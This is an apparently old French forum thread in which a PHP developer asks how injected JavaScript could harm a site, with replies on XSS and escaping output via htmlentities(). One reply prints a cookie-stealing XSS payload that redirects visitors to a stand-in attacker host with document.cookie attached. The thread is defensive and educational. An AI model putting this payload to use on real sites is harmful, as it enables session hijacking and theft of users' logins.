je programme en php et je voulais savoir ce qui etait dangereux comme javascript au cas ou quelqu'un arrive a inserer du javascript dans ma page ?

Cross site scripting (XSS) :
 
<script>document.location='http://www.lesiteduhacker.com/cookie.cgi? '%20+document.cookie</script>
 
permet d'envoyer sur le site du vilain les cookies utilisé pour ton site, le plus interressant étant évidemment login et mots de passe, identifiant de session.
 
Sinon, une connerier du genre :  
window.open (document.location)
 
Toujours pénible
 
FAQ XSS : http://www.cgisecurity.com/articles/xss-faq.shtml

c si puissant que ca    
 
on serait dans la merde si ca arrivait avec le forum de joce

oui mais bon, si tu fais un minimum attention ben t'as pas ce genre de failles

tu sais l'erreur est humaine

sinon ya que ca comme faille ?

un commentaire dans la doc de php.net
 

faille d'include
faille de post/get  
etc.. un coup de google tu trouveras ton bonheur

je parlais de faille javascript,a part le script pour recuper le cookies,ya rien d'autre ?

ben tout ce que peux faire un script... ya pas non plus que le javascript... si t sous win t'as le vbscript (language de bcp de virus ) qui peut etre bien plus mechant...

 
bon ben je vais verifier tout ca

suffit de desactiver le html ds toutes les entrees utilisateur...

Non, suffit de correctement quoter tout ce qui est du texte.
 
En PHP, htmlentities() et urlencode() font ça très bien.

 
oui donc c ce que j'ai dis en gros hein

Non, tu as dit qu'il fallait "desactiver le html".
 
Pour moi ca veut dire que tu retires tout ce qui ressemble à une balise (genre si le mec veut poster <script language="text/vbscript"> il peut pas car c'est viré au lieu d'etre affiché. Il y a des forums qui font ça) .

mouais, enfin je pensais a htmlentities()